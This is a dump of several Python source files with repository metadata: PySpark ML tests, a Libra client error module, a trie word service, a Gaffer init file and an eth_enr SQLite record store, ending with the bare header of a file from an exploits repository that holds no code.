cvModel = cv.fit(dataset)
cvPath = temp_path + "/cv"
cv.save(cvPath)
loadedCV = CrossValidator.load(cvPath)
self.assertEqual(loadedCV.getEstimator().uid, cv.getEstimator().uid)
self.assertEqual(loadedCV.getEvaluator().uid, cv.getEvaluator().uid)
self.assertEqual(loadedCV.getEstimatorParamMaps(), cv.getEstimatorParamMaps())
cvModelPath = temp_path + "/cvModel"
cvModel.save(cvModelPath)
loadedModel = CrossValidatorModel.load(cvModelPath)
self.assertEqual(loadedModel.bestModel.uid, cvModel.bestModel.uid)
class TrainValidationSplitTests(PySparkTestCase):
def test_fit_minimize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="rmse")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
tvs = TrainValidationSplit(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
tvsModel = tvs.fit(dataset)
bestModel = tvsModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(0.0, bestModelMetric, "Best model has RMSE of 0")
def test_fit_maximize_metric(self):
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame([
(10, 10.0),
(50, 50.0),
(100, 100.0),
(500, 500.0)] * 10,
["feature", "label"])
iee = InducedErrorEstimator()
evaluator = RegressionEvaluator(metricName="r2")
grid = (ParamGridBuilder()
.addGrid(iee.inducedError, [100.0, 0.0, 10000.0])
.build())
tvs = TrainValidationSplit(estimator=iee, estimatorParamMaps=grid, evaluator=evaluator)
tvsModel = tvs.fit(dataset)
bestModel = tvsModel.bestModel
bestModelMetric = evaluator.evaluate(bestModel.transform(dataset))
self.assertEqual(0.0, bestModel.getOrDefault('inducedError'),
"Best model should have zero induced error")
self.assertEqual(1.0, bestModelMetric, "Best model has R-squared of 1")
def test_save_load(self):
temp_path = tempfile.mkdtemp()
sqlContext = SQLContext(self.sc)
dataset = sqlContext.createDataFrame(
[(Vectors.dense([0.0]), 0.0),
(Vectors.dense([0.4]), 1.0),
(Vectors.dense([0.5]), 0.0),
(Vectors.dense([0.6]), 1.0),
(Vectors.dense([1.0]), 1.0)] * 10,
["features", "label"])
lr = LogisticRegression()
grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
evaluator = BinaryClassificationEvaluator()
tvs = TrainValidationSplit(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator)
tvsModel = tvs.fit(dataset)
tvsPath = temp_path + "/tvs"
tvs.save(tvsPath)
loadedTvs = TrainValidationSplit.load(tvsPath)
self.assertEqual(loadedTvs.getEstimator().uid, tvs.getEstimator().uid)
self.assertEqual(loadedTvs.getEvaluator().uid, tvs.getEvaluator().uid)
self.assertEqual(loadedTvs.getEstimatorParamMaps(), tvs.getEstimatorParamMaps())
tvsModelPath = temp_path + "/tvsModel"
tvsModel.save(tvsModelPath)
loadedModel = TrainValidationSplitModel.load(tvsModelPath)
self.assertEqual(loadedModel.bestModel.uid, tvsModel.bestModel.uid)
class PersistenceTest(PySparkTestCase):
def test_linear_regression(self):
lr = LinearRegression(maxIter=1)
path = tempfile.mkdtemp()
lr_path = path + "/lr"
lr.save(lr_path)
lr2 = LinearRegression.load(lr_path)
self.assertEqual(lr.uid, lr2.uid)
self.assertEqual(type(lr.uid), type(lr2.uid))
self.assertEqual(lr2.uid, lr2.maxIter.parent,
"Loaded LinearRegression instance uid (%s) did not match Param's uid (%s)"
% (lr2.uid, lr2.maxIter.parent))
self.assertEqual(lr._defaultParamMap[lr.maxIter], lr2._defaultParamMap[lr2.maxIter],
"Loaded LinearRegression instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
def test_logistic_regression(self):
lr = LogisticRegression(maxIter=1)
path = tempfile.mkdtemp()
lr_path = path + "/logreg"
lr.save(lr_path)
lr2 = LogisticRegression.load(lr_path)
self.assertEqual(lr2.uid, lr2.maxIter.parent,
"Loaded LogisticRegression instance uid (%s) "
"did not match Param's uid (%s)"
% (lr2.uid, lr2.maxIter.parent))
self.assertEqual(lr._defaultParamMap[lr.maxIter], lr2._defaultParamMap[lr2.maxIter],
"Loaded LogisticRegression instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
def _compare_pipelines(self, m1, m2):
"""
Compare 2 ML types, asserting that they are equivalent.
This currently supports:
- basic types
- Pipeline, PipelineModel
This checks:
- uid
- type
- Param values and parents
"""
self.assertEqual(m1.uid, m2.uid)
self.assertEqual(type(m1), type(m2))
if isinstance(m1, JavaParams):
self.assertEqual(len(m1.params), len(m2.params))
for p in m1.params:
self.assertEqual(m1.getOrDefault(p), m2.getOrDefault(p))
self.assertEqual(p.parent, m2.getParam(p.name).parent)
elif isinstance(m1, Pipeline):
self.assertEqual(len(m1.getStages()), len(m2.getStages()))
for s1, s2 in zip(m1.getStages(), m2.getStages()):
self._compare_pipelines(s1, s2)
elif isinstance(m1, PipelineModel):
self.assertEqual(len(m1.stages), len(m2.stages))
for s1, s2 in zip(m1.stages, m2.stages):
self._compare_pipelines(s1, s2)
else:
raise RuntimeError("_compare_pipelines does not yet support type: %s" % type(m1))
def test_pipeline_persistence(self):
"""
Pipeline[HashingTF, PCA]
"""
sqlContext = SQLContext(self.sc)
temp_path = tempfile.mkdtemp()
try:
df = sqlContext.createDataFrame([(["a", "b", "c"],), (["c", "d", "e"],)], ["words"])
tf = HashingTF(numFeatures=10, inputCol="words", outputCol="features")
pca = PCA(k=2, inputCol="features", outputCol="pca_features")
pl = Pipeline(stages=[tf, pca])
model = pl.fit(df)
pipeline_path = temp_path + "/pipeline"
pl.save(pipeline_path)
loaded_pipeline = Pipeline.load(pipeline_path)
self._compare_pipelines(pl, loaded_pipeline)
model_path = temp_path + "/pipeline-model"
model.save(model_path)
loaded_model = PipelineModel.load(model_path)
self._compare_pipelines(model, loaded_model)
finally:
try:
rmtree(temp_path)
except OSError:
pass
def test_nested_pipeline_persistence(self):
"""
Pipeline[HashingTF, Pipeline[PCA]]
"""
sqlContext = SQLContext(self.sc)
temp_path = tempfile.mkdtemp()
try:
df = sqlContext.createDataFrame([(["a", "b", "c"],), (["c", "d", "e"],)], ["words"])
tf = HashingTF(numFeatures=10, inputCol="words", outputCol="features")
pca = PCA(k=2, inputCol="features", outputCol="pca_features")
p0 = Pipeline(stages=[pca])
pl = Pipeline(stages=[tf, p0])
model = pl.fit(df)
pipeline_path = temp_path + "/pipeline"
pl.save(pipeline_path)
loaded_pipeline = Pipeline.load(pipeline_path)
self._compare_pipelines(pl, loaded_pipeline)
model_path = temp_path + "/pipeline-model"
model.save(model_path)
loaded_model = PipelineModel.load(model_path)
self._compare_pipelines(model, loaded_model)
finally:
try:
rmtree(temp_path)
except OSError:
pass
def test_write_property(self):
lr = LinearRegression(maxIter=1)
self.assertTrue(isinstance(lr.write, MLWriter))
def test_decisiontree_classifier(self):
dt = DecisionTreeClassifier(maxDepth=1)
path = tempfile.mkdtemp()
dtc_path = path + "/dtc"
dt.save(dtc_path)
dt2 = DecisionTreeClassifier.load(dtc_path)
self.assertEqual(dt2.uid, dt2.maxDepth.parent,
"Loaded DecisionTreeClassifier instance uid (%s) "
"did not match Param's uid (%s)"
% (dt2.uid, dt2.maxDepth.parent))
self.assertEqual(dt._defaultParamMap[dt.maxDepth], dt2._defaultParamMap[dt2.maxDepth],
"Loaded DecisionTreeClassifier instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
def test_decisiontree_regressor(self):
dt = DecisionTreeRegressor(maxDepth=1)
path = tempfile.mkdtemp()
dtr_path = path + "/dtr"
dt.save(dtr_path)
dt2 = DecisionTreeClassifier.load(dtr_path)
self.assertEqual(dt2.uid, dt2.maxDepth.parent,
"Loaded DecisionTreeRegressor instance uid (%s) "
"did not match Param's uid (%s)"
% (dt2.uid, dt2.maxDepth.parent))
self.assertEqual(dt._defaultParamMap[dt.maxDepth], dt2._defaultParamMap[dt2.maxDepth],
"Loaded DecisionTreeRegressor instance default params did not match " +
"original defaults")
try:
rmtree(path)
except OSError:
pass
class TrainingSummaryTest(PySparkTestCase):
def test_linear_regression_summary(self):
from pyspark.mllib.linalg import Vectors
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(1.0, 2.0, Vectors.dense(1.0)),
(0.0, 2.0, Vectors.sparse(1, [], []))],
["label", "weight", "features"])
lr = LinearRegression(maxIter=5, regParam=0.0, solver="normal", weightCol="weight",
fitIntercept=False)
model = lr.fit(df)
self.assertTrue(model.hasSummary)
s = model.summary
# test that api is callable and returns expected types
self.assertGreater(s.totalIterations, 0)
self.assertTrue(isinstance(s.predictions, DataFrame))
self.assertEqual(s.predictionCol, "prediction")
self.assertEqual(s.labelCol, "label")
self.assertEqual(s.featuresCol, "features")
objHist = s.objectiveHistory
self.assertTrue(isinstance(objHist, list) and isinstance(objHist[0], float))
self.assertAlmostEqual(s.explainedVariance, 0.25, 2)
self.assertAlmostEqual(s.meanAbsoluteError, 0.0)
self.assertAlmostEqual(s.meanSquaredError, 0.0)
self.assertAlmostEqual(s.rootMeanSquaredError, 0.0)
self.assertAlmostEqual(s.r2, 1.0, 2)
self.assertTrue(isinstance(s.residuals, DataFrame))
self.assertEqual(s.numInstances, 2)
devResiduals = s.devianceResiduals
self.assertTrue(isinstance(devResiduals, list) and isinstance(devResiduals[0], float))
coefStdErr = s.coefficientStandardErrors
self.assertTrue(isinstance(coefStdErr, list) and isinstance(coefStdErr[0], float))
tValues = s.tValues
self.assertTrue(isinstance(tValues, list) and isinstance(tValues[0], float))
pValues = s.pValues
self.assertTrue(isinstance(pValues, list) and isinstance(pValues[0], float))
# test evaluation (with training dataset) produces a summary with same values
# one check is enough to verify a summary is returned, Scala version runs full test
sameSummary = model.evaluate(df)
self.assertAlmostEqual(sameSummary.explainedVariance, s.explainedVariance)
def test_logistic_regression_summary(self):
from pyspark.mllib.linalg import Vectors
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(1.0, 2.0, Vectors.dense(1.0)),
(0.0, 2.0, Vectors.sparse(1, [], []))],
["label", "weight", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01, weightCol="weight", fitIntercept=False)
model = lr.fit(df)
self.assertTrue(model.hasSummary)
s = model.summary
# test that api is callable and returns expected types
self.assertTrue(isinstance(s.predictions, DataFrame))
self.assertEqual(s.probabilityCol, "probability")
self.assertEqual(s.labelCol, "label")
self.assertEqual(s.featuresCol, "features")
objHist = s.objectiveHistory
self.assertTrue(isinstance(objHist, list) and isinstance(objHist[0], float))
self.assertGreater(s.totalIterations, 0)
self.assertTrue(isinstance(s.roc, DataFrame))
self.assertAlmostEqual(s.areaUnderROC, 1.0, 2)
self.assertTrue(isinstance(s.pr, DataFrame))
self.assertTrue(isinstance(s.fMeasureByThreshold, DataFrame))
self.assertTrue(isinstance(s.precisionByThreshold, DataFrame))
self.assertTrue(isinstance(s.recallByThreshold, DataFrame))
# test evaluation (with training dataset) produces a summary with same values
# one check is enough to verify a summary is returned, Scala version runs full test
sameSummary = model.evaluate(df)
self.assertAlmostEqual(sameSummary.areaUnderROC, s.areaUnderROC)
class OneVsRestTests(PySparkTestCase):
def test_copy(self):
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr)
ovr1 = ovr.copy({lr.maxIter: 10})
self.assertEqual(ovr.getClassifier().getMaxIter(), 5)
self.assertEqual(ovr1.getClassifier().getMaxIter(), 10)
model = ovr.fit(df)
model1 = model.copy({model.predictionCol: "indexed"})
self.assertEqual(model1.getPredictionCol(), "indexed")
def test_output_columns(self):
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(0.0, Vectors.dense(1.0, 0.8)),
(1.0, Vectors.sparse(2, [], [])),
(2.0, Vectors.dense(0.5, 0.5))],
["label", "features"])
lr = LogisticRegression(maxIter=5, regParam=0.01)
ovr = OneVsRest(classifier=lr)
model = ovr.fit(df)
output = model.transform(df)
self.assertEqual(output.columns, ["label", "features", "prediction"])
class HashingTFTest(PySparkTestCase):
def test_apply_binary_term_freqs(self):
sqlContext = SQLContext(self.sc)
df = sqlContext.createDataFrame([(0, ["a", "a", "b", "c", "c", "c"])], ["id", "words"])
n = 100
hashingTF = HashingTF()
hashingTF.setInputCol("words").setOutputCol("features").setNumFeatures(n).setBinary(True)
output = hashingTF.transform(df)
features = output.select("features").first().features.toArray()
expected = Vectors.sparse(n, {(ord("a") % n): 1.0,
(ord("b") % n): 1.0,
(ord("c") % n): 1.0}).toArray()
for i in range(0, n):
self.assertAlmostEqual(features[i], expected[i], 14, "Error at " + str(i) +
": expected " + str(expected[i]) + ", got " + str(features[i]))
if __name__ == "__main__":
from pyspark.ml.tests import *
if xmlrunner:
unittest.main(testRunner=xmlrunner.XMLTestRunner(output='target/test-reports'))
else:
unittest.main()
| 40.928571
| 99
| 0.623976
|
cc4a626327e7e73a246d2263da658c946326c65d
| 323
|
py
|
Python
|
src/test/testKnot/sub.py
|
qftphys/Calculation-of-thermal-conductivity-of-graphene-knot-under-strain-
|
90537448eef11b034cb252025295868591de0919
|
[
"MIT"
] | 2
|
2017-06-19T05:58:58.000Z
|
2017-09-28T08:31:29.000Z
|
src/test/testKnot/sub.py
|
qftphys/Calculation-of-thermal-conductivity-of-graphene-knot-under-strain-
|
90537448eef11b034cb252025295868591de0919
|
[
"MIT"
] | null | null | null |
src/test/testKnot/sub.py
|
qftphys/Calculation-of-thermal-conductivity-of-graphene-knot-under-strain-
|
90537448eef11b034cb252025295868591de0919
|
[
"MIT"
] | null | null | null |
from aces import Aces
class sub(Aces):
def submit(self):
opt=dict(
units="metal",
species="graphene_knot",
method="nvt",
nodes=1,
procs=12,
queue="q1.1",
runTime=10000000
,runner="mdTc"
)
app=dict(latx=70,laty=2)
self.commit(opt,app);
if __name__=='__main__':
sub().run()
| 17.944444
| 28
| 0.597523
|
91aef4be0b1227e5097cc786d0d3c5b3108eb06c
| 582
|
py
|
Python
|
libra_client/error.py
|
yuan-xy/libra-client
|
697058bfa7bc8e8a7a2598dae4bb289f44524dba
|
[
"MIT"
] | 30
|
2019-09-16T12:50:33.000Z
|
2020-10-27T20:06:26.000Z
|
libra_client/error.py
|
yuan-xy/libra-client
|
697058bfa7bc8e8a7a2598dae4bb289f44524dba
|
[
"MIT"
] | 7
|
2019-09-18T14:23:09.000Z
|
2020-03-31T10:10:04.000Z
|
libra_client/error.py
|
yuan-xy/libra-client
|
697058bfa7bc8e8a7a2598dae4bb289f44524dba
|
[
"MIT"
] | 12
|
2019-09-22T15:43:56.000Z
|
2020-08-07T08:51:35.000Z
|
class LibraError(Exception):
pass
class AccountError(LibraError):
pass
class TransactionError(LibraError):
@property
def error_code(self):
code, _ = self.args
return code
@property
def error_msg(self):
_, msg = self.args
return msg
class AdmissionControlError(TransactionError):
pass
class VMError(TransactionError):
pass
class MempoolError(TransactionError):
pass
class TransactionTimeoutError(LibraError):
pass
class LibraNetError(LibraError):
pass
| 14.55
| 47
| 0.639175
|
e90345405ce81e36894a862e7308698923a12cdf
| 591
|
py
|
Python
|
wordservice/src/wordservice/word_service.py
|
mjm461/step-funtions-example
|
3cd77cdc03b42d7496e47e505c19161b4913b110
|
[
"MIT"
] | null | null | null |
wordservice/src/wordservice/word_service.py
|
mjm461/step-funtions-example
|
3cd77cdc03b42d7496e47e505c19161b4913b110
|
[
"MIT"
] | null | null | null |
wordservice/src/wordservice/word_service.py
|
mjm461/step-funtions-example
|
3cd77cdc03b42d7496e47e505c19161b4913b110
|
[
"MIT"
] | null | null | null |
import os
from .trie import Trie
class WordService(object):
_resources_dir = os.path.normpath(os.path.join(os.path.dirname(__file__), 'resources'))
def __init__(self):
self._trie = Trie()
with open(os.path.join(self._resources_dir, 'words_alpha.txt')) as fin:
for word in fin.read().split('\n'):
if word:
self._trie.insert(word)
def search(self, word):
return self._trie.search(word)
def starts_with(self, prefix, max_found=100):
return self._trie.starts_with(prefix, max_found=max_found)
| 28.142857
| 91
| 0.632826
|
4025398e90983cf52a5e14807954e78264750801
| 1,925
|
py
|
Python
|
python/GafferTractorUI/__init__.py
|
sebaDesmet/gaffer
|
47b2d093c40452bd77947e3b5bd0722a366c8d59
|
[
"BSD-3-Clause"
] | 1
|
2019-08-02T16:49:59.000Z
|
2019-08-02T16:49:59.000Z
|
python/GafferTractorUI/__init__.py
|
rkoschmitzky/gaffer
|
ec6262ae1292767bdeb9520d1447d65a4a511884
|
[
"BSD-3-Clause"
] | null | null | null |
python/GafferTractorUI/__init__.py
|
rkoschmitzky/gaffer
|
ec6262ae1292767bdeb9520d1447d65a4a511884
|
[
"BSD-3-Clause"
] | 1
|
2020-12-21T12:33:49.000Z
|
2020-12-21T12:33:49.000Z
|
##########################################################################
#
# Copyright (c) 2016, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import TractorDispatcherUI
__import__( "IECore" ).loadConfig( "GAFFER_STARTUP_PATHS", subdirectory = "GafferTractorUI" )
| 48.125
| 93
| 0.688831
|
2185d391562abc2f45a9a0c1ad300920121c042e
| 11,563
|
py
|
Python
|
eth_enr/sqlite3_db.py
|
ethereum/eth-enr
|
80bd08a3be09a6a1f6cc3145e44851e1e1bf71d9
|
[
"MIT"
] | 4
|
2020-09-01T07:46:51.000Z
|
2021-11-04T14:09:02.000Z
|
eth_enr/sqlite3_db.py
|
ethereum/eth-enr
|
80bd08a3be09a6a1f6cc3145e44851e1e1bf71d9
|
[
"MIT"
] | 9
|
2020-09-02T01:56:09.000Z
|
2020-11-30T16:00:01.000Z
|
eth_enr/sqlite3_db.py
|
ethereum/eth-enr
|
80bd08a3be09a6a1f6cc3145e44851e1e1bf71d9
|
[
"MIT"
] | 6
|
2020-08-31T22:31:47.000Z
|
2022-03-28T18:50:04.000Z
|
import datetime
import logging
import operator
import sqlite3
from typing import Collection, Iterable, NamedTuple, Optional, Sequence, Tuple, Union
from eth_typing import NodeID
import rlp
from rlp.exceptions import DecodingError, DeserializationError, SerializationError
from eth_enr.abc import ENRAPI
from eth_enr.enr import ENR
from eth_enr.sedes import ENR_KEY_SEDES_MAPPING
logger = logging.getLogger("eth_enr.sqlite3")
RECORD_CREATE_STATEMENT = """CREATE TABLE record (
node_id BLOB NOT NULL,
short_node_id INTEGER NOT NULL,
sequence_number INTEGER NOT NULL,
signature BLOB NOT NULL,
created_at DATETIME NOT NULL,
PRIMARY KEY (node_id, sequence_number),
CONSTRAINT _sequence_number_positive CHECK (sequence_number >= 0)
)
"""
RECORD_INDEXES_AND_CONSTRAINTS = (
"CREATE UNIQUE INDEX ix_node_id_sequence_number ON record (node_id, sequence_number)",
)
FIELD_CREATE_STATEMENT = """CREATE TABLE field (
node_id BLOB NOT NULL,
sequence_number INTEGER NOT NULL,
"key" BLOB NOT NULL,
value BLOB NOT NULL,
PRIMARY KEY (node_id, sequence_number, "key"),
CONSTRAINT uix_node_id_key UNIQUE (node_id, sequence_number, "key"),
FOREIGN KEY(node_id) REFERENCES record (node_id),
FOREIGN KEY(sequence_number) REFERENCES record (sequence_number)
)
"""
FIELD_INDEXES_AND_CONSTRAINTS = (
'CREATE UNIQUE INDEX ix_node_id_sequence_number_key ON field (node_id, sequence_number, "key")', # noqa: E501
)
def create_tables(conn: sqlite3.Connection) -> None:
record_table_exists = (
conn.execute(
"SELECT name FROM sqlite_master WHERE type='table' AND name=?", ("record",)
).fetchone()
is not None
)
field_table_exists = (
conn.execute(
"SELECT name FROM sqlite_master WHERE type='table' AND name=?", ("field",)
).fetchone()
is not None
)
if record_table_exists and field_table_exists:
return
with conn:
conn.execute(RECORD_CREATE_STATEMENT)
conn.commit()
for statement in RECORD_INDEXES_AND_CONSTRAINTS:
conn.execute(statement)
conn.commit()
conn.execute(FIELD_CREATE_STATEMENT)
conn.commit()
for statement in FIELD_INDEXES_AND_CONSTRAINTS:
conn.execute(statement)
conn.commit()
def _encode_enr_value(key: bytes, value: Union[int, bytes]) -> bytes:
try:
sedes = ENR_KEY_SEDES_MAPPING[key]
except KeyError:
if isinstance(value, bytes):
return value
else:
raise TypeError(f"Cannot store non-bytes value: {type(value)}")
else:
try:
return rlp.encode(value, sedes=sedes) # type: ignore
except SerializationError:
if isinstance(value, bytes):
return value
else:
raise
def _decode_enr_value(key: bytes, raw: bytes) -> Union[int, bytes]:
try:
sedes = ENR_KEY_SEDES_MAPPING[key]
except KeyError:
return raw
else:
try:
return rlp.decode(raw, sedes=sedes) # type: ignore
except (DeserializationError, DecodingError):
return raw
class Field(NamedTuple):
node_id: NodeID
sequence_number: int
key: bytes
value: bytes
@classmethod
def from_row(cls, row: Tuple[bytes, int, bytes, bytes]) -> "Field":
(
raw_node_id,
sequence_number,
key,
value,
) = row
return cls(
node_id=NodeID(raw_node_id),
sequence_number=sequence_number,
key=key,
value=value,
)
def to_database_params(self) -> Tuple[NodeID, int, bytes, bytes]:
return (
self.node_id,
self.sequence_number,
self.key,
self.value,
)
DB_DATETIME_FORMAT = "%Y-%m-%d %H:%M:%S.%f"
class Record(NamedTuple):
node_id: NodeID
sequence_number: int
signature: bytes
created_at: datetime.datetime
fields: Tuple[Field, ...]
@classmethod
def from_enr(cls, enr: ENRAPI) -> "Record":
fields = tuple(
sorted(
(
Field(
node_id=enr.node_id,
sequence_number=enr.sequence_number,
key=key,
value=_encode_enr_value(key, value),
)
for key, value in enr.items()
),
key=operator.attrgetter("key"),
)
)
return cls(
node_id=enr.node_id,
sequence_number=enr.sequence_number,
signature=enr.signature,
created_at=datetime.datetime.utcnow(),
fields=fields,
)
def to_enr(self) -> ENRAPI:
kv_pairs = {
field.key: _decode_enr_value(field.key, field.value)
for field in self.fields
}
return ENR(
sequence_number=self.sequence_number,
kv_pairs=kv_pairs,
signature=self.signature,
)
@classmethod
def from_row(
cls, row: Tuple[bytes, int, bytes, str], fields: Collection[Field]
) -> "Record":
(
raw_node_id,
sequence_number,
signature,
raw_created_at,
) = row
return cls(
node_id=NodeID(raw_node_id),
sequence_number=sequence_number,
signature=signature,
created_at=datetime.datetime.strptime(raw_created_at, DB_DATETIME_FORMAT),
fields=tuple(sorted(fields, key=operator.attrgetter("key"))),
)
def to_database_params(self) -> Tuple[NodeID, int, int, bytes, str]:
return (
self.node_id,
# The high 64 bits of the node_id for doing proximate queries
int.from_bytes(self.node_id, "big") >> 193,
self.sequence_number,
self.signature,
self.created_at.isoformat(sep=" "),
)
RECORD_INSERT_QUERY = "INSERT INTO record (node_id, short_node_id, sequence_number, signature, created_at) VALUES (?, ?, ?, ?, ?)" # noqa: E501
FIELD_INSERT_QUERY = (
'INSERT INTO field (node_id, sequence_number, "key", value) VALUES (?, ?, ?, ?)'
)
def insert_record(conn: sqlite3.Connection, record: Record) -> None:
with conn:
conn.execute(RECORD_INSERT_QUERY, record.to_database_params())
field_params = tuple(field.to_database_params() for field in record.fields)
conn.executemany(FIELD_INSERT_QUERY, field_params)
RECORD_GET_QUERY = """SELECT
record.node_id AS record_node_id,
record.sequence_number AS record_sequence_number,
record.signature AS record_signature,
record.created_at AS record_created_at
FROM record
WHERE record.node_id = ?
ORDER BY record.sequence_number DESC
LIMIT 1
"""
FIELD_GET_QUERY = """SELECT
field.node_id AS field_node_id,
field.sequence_number AS field_sequence_number,
field."key" AS field_key,
field.value AS field_value
FROM field
WHERE ? = field.node_id AND ? = field.sequence_number
"""
class RecordNotFound(Exception):
pass
def get_record(conn: sqlite3.Connection, node_id: NodeID) -> Record:
record_row = conn.execute(RECORD_GET_QUERY, (node_id,)).fetchone()
if record_row is None:
raise RecordNotFound(f"No record found: node_id={node_id.hex()}")
field_rows = conn.execute(FIELD_GET_QUERY, (node_id, record_row[1])).fetchall()
fields = tuple(Field.from_row(row) for row in field_rows)
record = Record.from_row(row=record_row, fields=fields)
return record
RECORD_GET_AT_SEQUENCE_NUMBER_QUERY = """SELECT
record.node_id AS record_node_id,
record.sequence_number AS record_sequence_number,
record.signature AS record_signature,
record.created_at AS record_created_at
FROM record
WHERE record.node_id = ? AND record.sequence_number == ?
ORDER BY record.sequence_number DESC
LIMIT 1
"""
def get_record_at_sequence_number(
conn: sqlite3.Connection, node_id: NodeID, sequence_number: int
) -> Record:
record_row = conn.execute(
RECORD_GET_AT_SEQUENCE_NUMBER_QUERY, (node_id, sequence_number)
).fetchone()
if record_row is None:
raise RecordNotFound(f"No record found: node_id={node_id.hex()}")
field_rows = conn.execute(FIELD_GET_QUERY, (node_id, sequence_number)).fetchall()
fields = tuple(Field.from_row(row) for row in field_rows)
record = Record.from_row(row=record_row, fields=fields)
return record
DELETE_RECORD_QUERY = """DELETE FROM record WHERE record.node_id = ?"""
DELETE_FIELD_QUERY = """DELETE FROM field WHERE field.node_id = ?"""
def delete_record(conn: sqlite3.Connection, node_id: NodeID) -> int:
with conn:
cursor = conn.execute(DELETE_RECORD_QUERY, (node_id,))
conn.execute(DELETE_FIELD_QUERY, (node_id,))
return cursor.rowcount # type: ignore
BASE_QUERY = """SELECT
record.node_id AS record_node_id,
record.sequence_number AS record_sequence_number,
record.signature AS record_signature,
record.created_at AS record_created_at
FROM record
INNER JOIN (
SELECT
record.node_id,
record.sequence_number,
MAX(record.sequence_number)
FROM record
GROUP BY record.node_id
) latest_record
ON
record.node_id == latest_record.node_id AND
record.sequence_number == latest_record.sequence_number
JOIN field
ON
record.node_id = field.node_id AND
record.sequence_number = field.sequence_number
{where_statements}
GROUP BY record.node_id
{order_by_statement}
"""
PROXIMATE_ORDER_BY_CLAUSE = """
ORDER BY ((?{PARAM_IDX} | record.short_node_id) - (?{PARAM_IDX} & record.short_node_id))
"""
EXISTS_CLAUSE = """EXISTS (
SELECT 1
FROM field
WHERE
record.node_id = field.node_id
AND record.sequence_number = field.sequence_number AND field."key" = ?
)
"""
def query_records(
conn: sqlite3.Connection,
required_keys: Sequence[bytes] = (),
order_closest_to: Optional[NodeID] = None,
) -> Iterable[Record]:
num_required_keys = len(required_keys)
if num_required_keys == 0:
where_clause = ""
elif num_required_keys == 1:
where_clause = f"WHERE {EXISTS_CLAUSE}"
else:
query_components = tuple([f"({EXISTS_CLAUSE})"] * num_required_keys)
combined_query_components = " AND ".join(query_components)
where_clause = f"WHERE {combined_query_components}"
if order_closest_to is None:
order_by_clause = ""
params = tuple(required_keys)
else:
order_by_clause = PROXIMATE_ORDER_BY_CLAUSE.format(
PARAM_IDX=num_required_keys + 1
)
short_node_id = int.from_bytes(order_closest_to, "big") >> 193
params = tuple(required_keys) + (short_node_id,)
query = BASE_QUERY.format(
where_statements=where_clause, order_by_statement=order_by_clause
)
logger.debug("query_records: query=%s params=%r", query, params)
for record_row in conn.execute(query, params):
node_id, sequence_number, *_ = record_row
field_rows = conn.execute(FIELD_GET_QUERY, (node_id, sequence_number))
fields = tuple(Field.from_row(row) for row in field_rows.fetchall())
record = Record.from_row(record_row, fields=fields)
yield record
| 29.724936
| 144
| 0.644469
|
6d3ed99e9ef9084eb5840963c001badf6b15792a
| 836
|
py
|
Python
|
Bugscan_exploits-master/exp_list/exp-955.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 11
|
2020-05-30T13:53:49.000Z
|
2021-03-17T03:20:59.000Z
|
Bugscan_exploits-master/exp_list/exp-955.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-13T03:25:18.000Z
|
2020-07-21T06:24:16.000Z
|
Bugscan_exploits-master/exp_list/exp-955.py
|
csadsl/poc_exp
|
e3146262e7403f19f49ee2db56338fa3f8e119c9
|
[
"MIT"
] | 6
|
2020-05-30T13:53:51.000Z
|
2020-12-01T21:44:26.000Z
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#__author__ = '1c3z'
